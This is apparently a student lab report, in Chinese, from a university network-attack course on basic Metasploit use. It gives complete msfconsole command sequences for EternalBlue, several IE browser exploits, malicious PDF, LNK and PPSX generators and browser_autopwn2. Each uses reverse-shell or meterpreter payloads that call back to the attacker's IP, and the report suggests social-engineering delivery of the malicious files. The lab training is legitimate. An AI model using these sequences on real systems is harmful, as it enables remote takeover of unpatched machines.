Exp5 MSF基础应用

实践内容


主动攻击

ms17_010_enternalblue

/*先search一下相关模块信息*/
use exploit/windows/smb/ms17_010_enternalblue //使用模块
set payload generic/shell_reverse_tcp //设置tcp反弹连接
set LPORT 5326 //攻击机端口
set LHOST 192.168.80.131 //攻击机ip
set RHOST 192.168.80.155 //被攻击者ip
exploit //执行
//直接进行扫描攻击,提权



针对浏览器

ms11_50

use windows/browser/ms11_050_mshtml_cobjectelement
set payload
windows/meterpreter/reverse_http //http反向回连
set LHOST 192.168.80.131 //攻击机ip
set LPORT 5326 //攻击端口
set URIPATH 5326cz //统一资源标识符路径设置
exploit
//跳转到生成的链接

失败了0.0,浏览器疯狂报错,xp这个不行,就换一个漏洞

ms14_064_ole_code_execution

use exploit/windows/browser/ms14_064_ole_code_execution //选择攻击模块
set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
show targets //查看靶机
set SRVHOST 192.168.80.131 //攻IP
set AllowPowerShellPrompt true //对安装powershell的系统生效
set LHOST 192.168.80.131
set target 0 //设置靶机
exploit //攻击
//将生成的URL在靶机的ie浏览器中打开,建立session并连接,提权

针对客户端

adobe_cooltype_sing

/*生成恶意文件*/
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp //tcp反向回连
set LHOST 192.168.80.131 //攻击机ip
set LPORT 5326 //攻击端口
set FILENAME 5326cz.pdf //设置生成pdf文件的名字
exploit
//生成文件成功后会显示该文件所存储的目录
//进入目录拖拽文件至靶机 /*进入监听模块*/
//使用back回到msf
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //tcp反向连接
set LHOST 192.168.80.131 //攻击机ip
set LPORT 5326 //攻击端口固定
exploit
//在靶机中打开文件,攻击成功

ms15_020 快捷方式图标漏洞

windows/smb/ms15_020_shortcut_icon_dllloader

use exploit/windows/smb/ms15_020_shortcut_icon_dllloader
set SRVHOST 192.168.80.131 //攻击机ip
set payload windows/meterpreter/reverse_tcp //tcp反向回连
set LHOST 192.168.80.131 //攻击机ip
exploit
//将生成的msf.lnk文件拖拽至靶机,打开,sessions连接

辅助模块auxiliary

gather/browser_info

主要用于信息收集,此处使用的gather/browser_info故名思义是收集浏览器信息

/*进入msf控制台*/
show auxiliary //查看所有辅助模块
use gather/browser_info //使用该模块
show options //查看相关配置
set SRVHOST 192.168.80.131 //攻击机ip
exploit //执行
//复制生成的URL,winXP连接,看到相关信息

sever/browser_autopwn2

这个辅助模块就很有意思,它会自己寻找合适的payload进行攻击

use auxiliary/server/browser_autopwn2
set SRVHOST 192.168.80.131
set URIPATH auto
//连接可被访问的URL,启动服务器
//浏览器跳转,回连成功,输入sessions 查看会话并连接
//提权



未成功例

sandworm

CVE-2014-4114 是OLE包管理INF 任意代码执行漏洞,该漏洞影响Win Vista,Win7等以上操作系统,攻击者使用Office PowerPoint作为攻击载体,该漏洞是在MicrosoftWindows和服务器上的OLE包管理器。在OLE打包文件(packer.dll)中能够下载并执行类似的INF外部文件,允许攻击者执行命令。

use exploit/windows/fileformat/ms14_060_sandworm
set payload windows/meterpreter/reverse_tcp
setLHOST
set LPORT
set FILENAME 5326cz.ppsx //生成文件
set UNCPATH \\\\192.168.80.131\\share //设置网络共享地址
exploit
//生成的三个文件都应该能在靶机的网络共享中通过输入攻击机的ip找到,但是我不知道为何访问不了
//使用靶机的power point 打开.ppsx文件,能够进行回连

查阅资料,这个漏洞的大致原理应该是

执行PPT –> 内置2个OLE对象–> OLE对象包含2个远程webdav地址 –>调用packager.dll的函数CPackage::OLE2MPlayerReadFromStream把远程的 .gif 和.inf 下载下来 —> 函数CPackage::DoVerb中调用SHELL32!CDefFolderMenu::InvokeCommand函数加载slides.inf,并安装这个inf文件–>inf将.gif重命名为.gif.exe。然后添加注册表启动项。

我认为的失败原因

  1. 没有office2007只有wps(不知道启动程序产不产生影响)
  2. 没有找到网络共享地址,直接拷贝不能到相关文件夹下进行调用

基础问题回答

  • exploit

    • 执行攻击,产生攻击模块的文件
  • payload
    • 载荷,传输进靶机之后为攻击者服务
  • encode
    • 编码,改变shellcode,对其进行伪装
  • 离实战还缺些什么技术或步骤?
    • 技术:技术欠缺很多,很多攻击不成功都找不到正确的原因,手段单一,可以变化更多
    • 社会工程学攻击:将生成好的恶意文件或代码包装一下发给受害者,找机会进行触发回连,当然回连也不能被发现

实践总结与体会

之前觉得只要掌握攻击原理,知道攻击步骤,通过show options,set [相关参数],执行攻击就会成功,但是其中其实有很多需要自己进行修改的地方,比如我的沙虫攻击做了很久都没有弄好,在查询相关资料修改之后还是没有成功,其中涉及到的网络共享知识,.inf文件的调用配置等等。做完所有的之后感到瑟瑟发抖,msf功能也太强大了叭,说不定我现在打字就在被监视Q^Q.

2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 20165326的更多相关文章

  1. 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础

    2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...

  2. 20155227《网络对抗》Exp5 MSF基础应用

    20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...

  3. 20155232《网络对抗》Exp5 MSF基础应用

    20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...

  4. 20155302《网络对抗》Exp5 MSF基础应用

    20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...

  5. 20155323刘威良《网络对抗》Exp5 MSF基础应用

    20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...

  6. 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用

    20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验  (首用) 渗透实验三:Adobe ...

  7. 20145215《网络对抗》Exp5 MSF基础应用

    20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...

  8. 20145208 蔡野 《网络对抗》Exp5 MSF基础应用

    20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...

  9. 20145311王亦徐 《网络对抗技术》 MSF基础应用

    20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...

  10. 20145325张梓靖 《网络对抗技术》 MSF基础应用

    20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...

随机推荐

  1. POJ 3616 奶牛挤奶

    Milking Time 贝茜是一个勤劳的牛.事实上,她如此​​专注于最大化她的生产力,于是她决定安排下一个N(1≤N≤1,000,000)小时(方便地标记为0..N-1),以便她生产尽可能多的牛奶. ...

  2. [python]Python代码安全分析工具(Bandit)

    简介: Bandit是一款Python源码分析框架,可用于Python代码的安全性分析.Bandit使用标准库中的ast模块,将Python源码解析成Python语法节点构成的树.Bandit允许用户 ...

  3. LayaAir引擎开发HTML5最简单教程(面向JS开发者)

    LayaAir引擎开发HTML5最简单教程(面向JS开发者) 一.总结 一句话总结:开发游戏还是得用游戏引擎来开发,其实很简单啦 切记:开发游戏还是得用游戏引擎来开发,其实很简单,引擎很多东西都帮你做 ...

  4. linux 用户密码过期时间

    /etc/login.defs    全局配置文件,即当新建用户时的默认设置 PASS_MIN_DAYS  5    #最近一次密码更新的日期+0 ,即允许用户更改自己的密码的日期 PASS_MAX_ ...

  5. 运维案例 | Exchange2010数据库损坏的紧急修复思路

    ​​关注嘉为科技,获取运维新知 Exchange后端数据库故障,一般都会是比较严重的紧急故障,因为这会直接影响到大面积用户的正常使用,而且涉及到用户数据.一旦遇到这种级别的故障,管理员往往都是在非常紧 ...

  6. gm图片处理器:The gm/convert binaries can't be found

    今天在使用node处理模块gm的时候,总是无法正常使用,报:The gm/convert binaries can't be found(找不到gm/convert二进制文件) google了一下,发 ...

  7. 448. Find All Numbers Disappeared in an Array&&645. Set Mismatch

    题目: 448. Find All Numbers Disappeared in an Array Given an array of integers where 1 ≤ a[i] ≤ n (n = ...

  8. Android studio和Genymotion-VirtualBox的配合使用

    Android Studio自带的模拟器实在是太慢了,对于我这种急性子来说简直...好了,我不想说脏话 那么我们就愉快的使用Genymotion好了 Android 开发最好的网站:http://ww ...

  9. 高可用性的负载均衡方案之lvs+keepalived和haproxy+heartbeat区别

    高可用性的负载均衡方案 目前使用比较多的就是标题中提到的这两者,其实lvs和haproxy都是实现的负载均衡的作用,keepalived和heartbeat都是提高高可用性的,避免单点故障.那么他们为 ...

  10. A context-aware personalized travel recommendation system based on geotagged social media data mining

    文章简介:利用社交网站Flickr上照片的geotag信息将这些照片聚类发现城市里的旅游景点,通过各照片的拍照时间得到用户访问某景点时的时间上下文和天气上下文(利用时间和public API of W ...